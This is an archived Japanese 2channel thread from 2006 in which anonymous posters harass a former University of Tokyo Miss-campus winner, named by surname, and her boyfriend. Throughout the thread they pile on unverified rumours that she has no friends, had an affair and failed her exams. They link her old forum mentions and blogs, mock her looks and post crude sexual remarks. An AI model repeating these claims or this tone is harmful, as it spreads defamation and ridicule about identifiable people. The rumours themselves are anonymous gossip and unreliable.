154 :無名モデル:2006/12/02(土) 18:53:06 ID:???
この121に浪人時代から友達がいないことが暴露されてるw

http://www.google.com/gwt/n?u=http%3A%2F%2Fwww.komaba.net%2Fcgi-bin%2Fmibbs.cgi%3Fmo%3Dp%26fo%3Dmain%26tn%3D0089%26rn%3D100&hl=ja&mrestrict=xhtmlchtml&lr=&inlang=ja&client=ms-kddi-jp&q=%E5%B0%8F%E6%AD%A3+%E7%94%B7&start=7&_gwt_noimg=1

155 :無名モデル:2006/12/02(土) 23:16:00 ID:???
>>154
121: 名前:名無しさん投稿日:2004/06/02(水) 01:09
この人と浪人時代おなじクラスやった。河合塾K3。
全然目立たなくて友達も一人もいない、
眼鏡かけて地味な子やったのに、、、
最近調子にのってるようなことは、浪人時代のクラス友達らのあいだで
たまにでてたけど、、、勘違い女、、、

156 :無名モデル:2006/12/03(日) 00:19:54 ID:???
>>155
なんか想像つく・・・今でも腐女子臭がするもんね

157 :無名モデル:2006/12/03(日) 00:33:18 ID:???
腐女子臭っていうか、友達らしい友達がいなそうなオーラを放ってるよね。
腹を割って話せる友達なんかいなそう。。

158 :無名モデル:2006/12/03(日) 01:17:23 ID:???
嫌われる素養のある女

159 :無名モデル:2006/12/03(日) 04:26:15 ID:8XhZ8Cc3
本当に友達いなさそうだね。一体どんな性格なんだろう…。

160 :無名モデル:2006/12/03(日) 09:36:14 ID:???
>>159
小正=自分に酔いすぎな、自意識過剰ナルシスト

161 :無名モデル:2006/12/03(日) 11:00:10 ID:???
自分から見たら、東大いけて美人てだけで羨ましいけどなあ…

162 :無名モデル:2006/12/03(日) 12:39:11 ID:???
善樹のいない日本の日曜は暇ですね、小正さん

163 :無名モデル:2006/12/03(日) 20:23:29 ID:???
いつも思うんだけど、このスレタイ考えた人、こまぴ本人?

164 :無名モデル:2006/12/03(日) 22:58:05 ID:???
>>163
本人かよしきだと思う

165 :無名モデル:2006/12/06(水) 02:57:55 ID:???
大学デビュー前のこまぴのダサダサめがねっこ写真みてぇ。

166 :無名モデル:2006/12/06(水) 15:00:29 ID:???
女学院卒の人,卒アルうpしてw

167 :無名モデル:2006/12/06(水) 19:02:35 ID:???
↑おのれはすっこんどれチンカスが。

http://life7.2ch.net/test/read.cgi/model/1165356286/

168 :無名モデル:2006/12/06(水) 23:00:11 ID:???
>>165
ミスになった年の翌年の東大2004(東大新聞社が毎年出している
受験生向けのもの)にメガネ姿が載ってたよー
「知的なアタシはいかが?」とでも言いたげなフフン顔だった。

169 :無名モデル:2006/12/07(木) 18:28:44 ID:???
このひと、東大ぽくなくすごい可愛いけどここではずいぶん嫌われてるんだね
やな奴なの?

170 :無名モデル:2006/12/07(木) 20:00:52 ID:???
女友達がいないんだからヤな奴なんだろ

171 :無名モデル:2006/12/08(金) 08:51:02 ID:???
>>169
彼氏が留学してる間に彼氏の友達とヤるような淫乱女だから
常に自分が一番じゃないと気が済まない女。理屈っぽくて鬱陶しい

172 :無名モデル:2006/12/08(金) 16:06:47 ID:???
また妄想ネタを書き込んでやがるwwとでも思いつつ
ちゃっかりここを覗くよしきwww

173 :無名モデル:2006/12/08(金) 23:23:09 ID:???
この人は,本当は卒業したら何になるんですか?
アナ?
モデル?

174 :無名モデル:2006/12/08(金) 23:27:26 ID:+DwWuc6S
なれるわけなかろう

175 :無名モデル:2006/12/09(土) 00:21:31 ID:sDTn83hO
>>173
大学院めざしてたけど、やめたんだって。ニートにでもなるんじゃないの
よしきと結婚したがってそうだけどw

176 :無名モデル:2006/12/09(土) 00:50:10 ID:???
やめたっていうか、自分の実力のなさをようやく悟ったんじゃね?
ガチでよしきとの結婚に逃げるに一票w

177 :無名モデル:2006/12/09(土) 02:39:48 ID:???
↑おのれはすっこんどれチンカスが。

http://life7.2ch.net/test/read.cgi/model/1165356286/

178 :無名モデル:2006/12/09(土) 04:39:20 ID:???
>>177
夜遅くからこまぴ乙

179 :無名モデル:2006/12/09(土) 07:53:34 ID:???
「政治家になりたい
官僚になりたい
研究者になりたい」
デカいこと言っといて結局フリーター、結婚て恥ずかしいなコイツ。
まー始めから「私ってば可愛いけど、やっぱ東大生だから
そこらの女子大生とは違うのよフフン」的アピールにしか見えなかったけどな。


180 :無名モデル:2006/12/09(土) 13:12:22 ID:???
女の結婚は逃げでもあるよねー

181 :無名モデル:2006/12/09(土) 13:57:02 ID:NJB7nDuf
連投乙

182 :無名モデル:2006/12/09(土) 15:11:28 ID:???
>>181
こマンピー乙☆
図星で悔しかったんですか?www口だけ女ww

183 :無名モデル:2006/12/09(土) 15:21:01 ID:???
>>176
よしきが医者になるまでは,親が許さないんじゃないか。
進振り,看護からの医学部枠と何が何でも医者にさせたいとの執念はスゴイ。
期待に応えようとすると,精神のバランス崩しかねない。
デキチャッタ婚はあるかも。

184 :無名モデル:2006/12/09(土) 15:43:53 ID:NJB7nDuf
よしきが結婚?
笑っちゃう

185 :無名モデル:2006/12/09(土) 19:03:46 ID:???
>>183
よしきも看護だしW

186 :通りすがりです:2006/12/09(土) 21:21:20 ID:VGe1LBj0
>171
そういう情報どこで仕入れるんですか?
彼女自身が暴露したのか、それとも相手の男が自慢してたとか?
友達いなさそうとの事ですが、ミス仲間に友達の一人ぐらいいそうなのでは?


187 :無名モデル:2006/12/09(土) 22:01:16 ID:???
小正本人?誰が書いてるか調べてどうするつもり?w


188 :無名モデル:2006/12/09(土) 22:04:58 ID:???
>>186
よしきの件はともかく、ダチがいないのはガチ。
小学校時代の同級には成人式後の飲み会ではぶられたり
(その参加時の服装等も詳細に書かれていたため、ガセではなさそう)、
浪人時代の河合塾生活でも友達がいなく(上レス参照、さらには弁当の中身まで暴露済み)、
大学で一人で昼飯を食う(複数の目撃証言アリ、よくグリスパで食ってたらしい)ほどの嫌われぶりw
ミスコン時は、小島らにはぶられている写真がバッチリ撮られていた。

189 :無名モデル:2006/12/09(土) 22:21:02 ID:???
こんなに可愛くて頭良くて嫌われるなんて珍しいね。
親が厳し過ぎて歪んだとかかな?カワイソス。

190 :無名モデル:2006/12/09(土) 22:33:29 ID:VGe1LBj0
>187
いえいえ、本人ではありませんよ。
東大ガイドブックのような本で写真を見て
美人だから同姓の友達(取り巻き?)に
不自由しなさそうって印象がありましたし。
>189
ありがとうございます。
そこまではぶにされるという事は、
相当気取りまくってるって事なのですね。

191 :無名モデル:2006/12/09(土) 22:38:51 ID:???
>>189
親は関係ないっしょ。

>>190
アメフト部の巨漢を引き連れてキモヲタにキモイと言い放ち、
嘲笑するような性悪なんだから、周りが自然と離れていくんだろうね。
これも目撃証言があったよ。

192 :無名モデル:2006/12/09(土) 23:24:28 ID:???
おまえら妄想やめれば?
全部2ちゃん上で書いてあったことじゃん。
美人だから友達に困らないなんて考えもおかしい。確かにこまぴみたいなキャンキャン系の女は女とグループをつくりたがるはずだけど。

193 :無名モデル:2006/12/10(日) 00:15:00 ID:???
>>192
妄想だって方向に持ってきたいみたいだけど、事実は事実。あきらめなよ。見苦しい

194 :無名モデル:2006/12/10(日) 00:30:41 ID:???
>>193
同意w
特にアメフトの件なんか、アンチ小正でない東大生のブログにも載ってたし、
その前にミルクにも書き込まれてたw
友達がいるという 妄 想 をしてるのは本人か信者の方でしょw

195 :無名モデル:2006/12/10(日) 01:00:52 ID:???
>>192
だから信憑性のある書き込みだと言ってんじゃん!
悔しくて訳わからなくなってるんだね〜

196 :無名モデル:2006/12/10(日) 02:49:12 ID:???
http://m.ameblo.jp/m/blogArticle.do?amebaId=&sessionId=&articleId=10020222412 見れば?

197 :無名モデル:2006/12/10(日) 07:56:36 ID:???
ググってまで証明したい小正

198 :無名モデル:2006/12/10(日) 23:31:17 ID:???
こんなに人望ないのに政治家志望だった小正

199 :無名モデル:2006/12/11(月) 00:36:08 ID:???
>>196
>考え方がグローバルww
↑この「w」が全てを物語っている。
ニート確定で、なんにでも手を出しては中途半端に終わる人間への嫌味だろう。

200 :無名モデル:2006/12/11(月) 00:55:49 ID:???
>>199
それ思った!小正のこと誉め殺ししてるけど、内心バカにしてるのがよく表れてるよねw


201 :無名モデル:2006/12/11(月) 02:11:06 ID:???
どうせ一、二度しか遊んでなさそう。。。
上辺だけのオトモダチ…

202 :無名モデル:2006/12/11(月) 03:11:31 ID:???
久野さんの可愛さが際立ってるね。

203 :無名モデル:2006/12/11(月) 03:58:17 ID:???
>>201
一年前に友達になったのに今まで一回も遊んでいなかった時点で、友達と言うより知り合いって感じだよね。

204 :無名モデル:2006/12/11(月) 14:27:58 ID:???
連絡先を交換しただけで友達に・・・

205 :無名モデル:2006/12/11(月) 19:59:09 ID:dmks2x28
・考え方がグローバルww
・叔父とユカコちゃんが意気投合してました(笑)

久野さんが小正さんをどう思ってるかがにじみ出てるww

206 :無名モデル:2006/12/11(月) 22:48:56 ID:???
久野さんの方が数段可愛いね。こまぴへの本音が見えてるけど。Wの使い方を間違えてるのではないみたいだし。

207 :無名モデル:2006/12/11(月) 23:29:50 ID:???
小正の巨顔を強調する写メだしね

208 :無名モデル:2006/12/13(水) 19:50:28 ID:???
久野さんかわいいな
さて、>>196のせいでこまぴはかかなくてもいい恥をかいてしまいました

209 :無名モデル:2006/12/13(水) 21:04:47 ID:g5FAgvL5
小正マジでプー太郎!?
確かに友達いないし高飛車な部分もあるけど、一応東大だし(看護だけどW)ミスオブミスになったような人間がフリーターとは世の中分からんねぇ…

そういえば、早稲田の足立も販売員だしホンマに世の中恐ろしや…

210 :無名モデル:2006/12/13(水) 21:44:02 ID:???
@院試の前に気が変わって結局院試受けなかった
A受けたけど落ちた
B受かったけど行かない

どれ?就活はしてなかったんだよね?

211 :無名モデル:2006/12/13(水) 22:12:00 ID:7/8rfz42
フリーターは自分で書いてたから本当だと思うよ。研究室からバックレるとも書いてた。

それにしても、東大・ミスオブミスをもってしても就職できないとは、どんだけ性格悪いんだW
それともよしきと結婚かな?

212 :無名モデル:2006/12/13(水) 22:44:06 ID:???
バックレるのではなく、教授から見切りを付けられたんじゃね?
ミスキャンブログでは休日返上で実習やってるだの
3月くらい?からは院試だから今夏は忙しいだの大口叩いてたけど、
実際は遊びほうけてて、とても真面目に学校に行ってるような感じではなかった。
ブログの内容とは裏腹に、今年の5,6月くらいには平気で実験をサボってた。

213 :無名モデル:2006/12/13(水) 23:51:35 ID:???
そうなんだ。
人生難しいね。
格好悪い自分を隠すためか宣伝までしてたブログまで放置してるし。何か一言でも載せた方が好感もてるのにね。見てくれてる人がいるんだから。

214 :無名モデル:2006/12/13(水) 23:53:53 ID:???
>>210
A

国1対策するも落ちこぼれで断念したくせに
研究者になりたくなったから辞めたと大嘘付く女だものw

215 :無名モデル:2006/12/14(木) 08:58:19 ID:Xj+LzqZg
つーかさ、よしき君もたいした事ないんでしょ?
ふつーのラクロス部だったってだけで、挙げ句の果てに謎の留学…
でもブログではやたら態度でかいよね?W

216 :無名モデル:2006/12/14(木) 09:44:46 ID:???
>>215
よしきの周りは東大卒でニートの友達が多いから、その中ではましなほう?
本人も東大卒業後ニートで、就職できなかったから留学に逃げたんだけど

217 :無名モデル:2006/12/14(木) 18:46:15 ID:???
留学しても卒業できず,ニート同士がくっ付くことになったら・・・・・・・orz

218 :無名モデル:2006/12/14(木) 20:10:58 ID:???
散々かっこつけて、今頃になってボロ出てきたね。
「政治家か官僚になりたい」
この一言でどれだけ調子こいてたか分かる。



219 :無名モデル:2006/12/14(木) 21:49:05 ID:???
そこがそもそも叩かれただした原因だった

220 :無名モデル:2006/12/14(木) 23:21:21 ID:e+7x7gu2
>211
ミスコン出身者だったらヴァカなテレビ局が大喜びで飛びついてきそうなのに、
この子のはそんな話なかったんだ。
ましてミスオブミスにまでなったのなら、さらにブランド価値が高まって簡単に
アナウンサー内定もらえそうなのに。
よっぽど性悪か常識がないかどっちかだね。

221 :220:2006/12/14(木) 23:22:59 ID:e+7x7gu2
×この子のは
○この子には
失礼しました。

222 :無名モデル:2006/12/14(木) 23:31:21 ID:sLouaMsL
>>216
確かブログで見たんだけど、東大のロースクール通ってる人もその一味?

223 :無名モデル:2006/12/15(金) 00:21:31 ID:nZM7V1pL
そもそもまともな奴はローなんか逝かんよ

224 :無名モデル:2006/12/15(金) 00:34:45 ID:???
>>220
フジテレビの中野美奈子と戸部洋子は同じ年にミスオブミスに参加したが、
中野は入賞すらしなかったのに対し、戸部はグランプリだった。
現在の人気は真逆なことからもわかるように、ミスオブミスなんて
あてになんないコンテストなのだよ。

225 :無名モデル:2006/12/15(金) 00:51:27 ID:???
>>220
歯並びすごい悪いんだよこの人。写真じゃ絶対口開けようとしない。
写真でもワンパターンな顔しかできないのにテレビなんて無理。

226 :無名モデル:2006/12/15(金) 01:25:13 ID:???
中野美奈子のほうがかわいいじゃん。前から思ってたけどミスオブミスってイマイチな子がミスになるよね。

227 :無名モデル:2006/12/15(金) 05:46:57 ID:???
>>224
準グランプリの杉浦友紀嬢は、いま立派にNHKアナとしてご活躍されておりますw

228 :無名モデル:2006/12/15(金) 07:39:40 ID:???
>>227
だがアンタは嫌われ女でニート確定だがな小正さんw

229 :無名モデル:2006/12/15(金) 08:59:41 ID:???
東大のアナなんて変にプライドだけ高くて使えない。それに今のアナは抜け感で勝負。実際TVを見る国民は馬鹿だから大学名が重要だよ。知性にも色々とある。自分の拙さを認めなければね。こまぴはじめ東大生はここが足りない。

230 :無名モデル:2006/12/15(金) 10:35:21 ID:???
こまぴがニートねぇ・・
後期入学の場合学力的に?の人が多い。
法学部でもローの既習コースに落ちて,法学部を出てない人が一から勉強する未習コースにしか受からなかった子がいるくらいだしねw

231 :無名モデル:2006/12/15(金) 15:25:46 ID:???
ニートカップルのくせに、二人とも勘違いして自分に酔ってるとこが激しくキモイ

232 :無名モデル:2006/12/22(金) 08:55:24 ID:???
よしき君はいい奴だよ。
後輩なんで直接知らないけど部活の人がいうには評判いいよ。
あんまり絡んでない人が妄想かくなよw

ただ小正さんはちょっと電波なのは事実だけどな。
なんか発言が空気読めてないし写真ほど生は可愛くない。
それなのにかなり勘違いしてるしいつも気持悪い男達といる。
ハブられてはない。自分から一人に酔ってる感じ。
他の東大女は地味だし、一緒にいる価値がないみたいな態度。
自己チューだがまぁ素直な子じゃないか?
木村や加藤で証明されてるが基本的に東大女はイタイんだけどねw

233 :無名モデル:2006/12/22(金) 10:28:43 ID:???
実物はどのくらいのレベルなの?久野さんとの写真とかのレベルかな。

234 :無名モデル:2006/12/22(金) 18:59:31 ID:???
>>232
基本的にイタイのはミスコンに出るような勘違いだけ。
大学デビューのコマサには地味ブスを見ると自分ののちょっと前の姿を思い出して前に自分がやられた事をやり返してるだけなんじゃないのw

235 :無名モデル:2006/12/22(金) 20:34:22 ID:???
>>232
男としかいれないくせにはぶられてないなんてwwwww

236 :無名モデル:2006/12/22(金) 23:03:36 ID:???
空気が読めない感じは、まあ、してた。「政治家になる」なんて自信満々で言うあたり
寒いなーって思ってた。

>他の東大女は地味だし、一緒にいる価値がないみたいな態度。

でも元は自分も地味だったから、本当に根っからの華やかな女の子にはついていけなさそう。
キャンパ友達いなさそうだったし。全然ブログにそういうの出てこなかったし、
ちょっとご飯食べに行っただけではしゃいじゃってる感じのブログ書いてたから。

237 :無名モデル:2006/12/23(土) 11:41:15 ID:???
そうそう、地味女とは一緒にいたくないが、
それなりに華やかな子達(東大でももちろんそういう子はいる)とも友達になれず、どっちつかずな印象


238 :無名モデル:2006/12/23(土) 13:31:53 ID:???
>>236
キャンパの子達とご飯食べに行ったり、ディズニーランド行ったりしたのに
嬉々としてブログに書いてるのはコマサだけで、一緒に行った子はブログでもノータッチだったよねww

239 :無名モデル:2006/12/23(土) 13:49:38 ID:???
前田みかのプラダを着た悪魔の試写会に行った云々のあたりをチェックしてみよう。散々映画の紹介をしておいて小正のことはコメントに対する返事に書くのみWかわいそう

240 :無名モデル:2006/12/23(土) 13:54:21 ID:???
http://m.ameblo.jp/m/blogArticle.do;jsessionid=5C4B210BDCD688C4408A6F11BD1D40C1?amebaId=&sessionId=&articleId=10019390327
ちなみにこれね

241 :無名モデル:2006/12/23(土) 17:28:01 ID:dUjaJ/vT
>236.238
それって思いっきりはぶられてますね。

242 :無名モデル:2006/12/23(土) 17:39:49 ID:???
てか、キャンパのブログって製品の紹介や映画の感想書いたりするんだろ?
プライベートなこと単品では、書かないだろ?
よっぽどきにしてるのね。

243 :無名モデル:2006/12/23(土) 17:49:18 ID:???
ブログもほったらかしだね。
初期キャンパブログにわいてた信者どもは今の体たらくを見て
どう思うんだろう。

244 :無名モデル:2006/12/23(土) 18:02:47 ID:???
>>242
でも一緒に食事した事は製品の宣伝とは全く関係ないのに書いてましたね小正さん。
それも相手にも私と食事したことブログに書いてね的なアピールまでして。

それに仕事やパーティーでも「誰々ちゃんと一緒でした〜」ってのは結構みんな書いてますけど。

245 :無名モデル:2006/12/23(土) 20:25:29 ID:Oq5qa9gH
>>242
日常的なことも書いたりしますよ。

246 :無名モデル:2006/12/24(日) 06:10:12 ID:???
メリークリトリス
こまぴぃはよしきとパコパコするのかなぁ☆

247 :無名モデル:2006/12/24(日) 13:32:04 ID:???
ミスキャンの人って最後落ちぶれてしまう人が多いのかな?
事務所にも責任あるのでは?
二十歳そこそこの学生のうちにパーティーやらなんやら派手な生活覚えさせている気がする
大人でもあんな生活はなかなかしないよ
文系ならまだよいけど、理系の学生はミスキャンに入らない方が良くないか?学業との両立が難しいだろー

248 :無名モデル:2006/12/24(日) 14:20:01 ID:???
>>245
今日は○○にいきました。
大学で○○でした。
とここで、私がいまきになってるのを紹介します。

こうだろ?wwwwwww

249 :無名モデル:2006/12/25(月) 19:54:07 ID:???
ただのセフレなのに、体だけじゃないと言い張る女。友達はいなくても男がいればいいタイプだね。

250 :無名モデル:2006/12/26(火) 03:20:19 ID:JPOr+DbD
よしきブログ、こまさが更新してるね。


251 :無名モデル:2006/12/26(火) 11:06:52 ID:???
>>250
相変わらずナルシスト全開な文章w
自分に酔い過ぎてて引いた

252 :無名モデル:2006/12/26(火) 15:37:59 ID:q0KxtmD/
このコメント欄のやりとりも引く
http://blog.livedoor.jp/ishikun3/archives/50802112.html#comments

3. Posted by cmp* 2006年12月23日 03:52
日々やっつけ仕事でこなしたレポートが、
時々財産のように思えることもあります。

15枚のレポートは、
50年後に振り返ると、ノーベル賞ものかも。

がんばってください!
4. Posted by yoshiki 2006年12月23日 09:51
>>cmp*

うん、同感!

お陰様で、cmp*さんのコメント見て、
元気になって、無事締め切り2分前に提出できました。

ありがとうね♪

よし、いざ帰国!!


50年後にノーベル賞って・・・

253 :無名モデル:2006/12/26(火) 17:16:01 ID:???
実験も真面目にやってないようなバカ女が何言ってんのって感じ
文章も相変わらずキモ過ぎ

254 :無名モデル:2006/12/26(火) 17:20:37 ID:???
バカ男を褒めていい気にさせてるw
さすがコマピ
だてにもてない長い期間を過ごしてないw

255 :無名モデル:2006/12/26(火) 20:26:49 ID:ttzbVtED
>247
その典型が八田亜矢子でしょう。
勉強せずにパーティー三昧、
うわさによると今年進級できないとか?
もしそうなったらミス東大にして東大中退ですね。
ある意味伝説になるなあ。

256 :247:2006/12/26(火) 20:45:27 ID:ttzbVtED
失礼。中退にはならないのですよね。
退学か。更にかっこワルい。

257 :無名モデル:2006/12/27(水) 12:24:22 ID:???
>>250
この女まじきもい・・・
自分を小説か何かの主人公だと思っちゃってるんじゃないの?
このカップルの会話きもそう

258 :無名モデル:2006/12/27(水) 14:31:05 ID:???
>>257
思った!
でも文才がないせいか、結局言いたいことがよくわからない人だよね。
本当に賢い人はこんなまわりくどい文なんか書かないってのにw

52 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)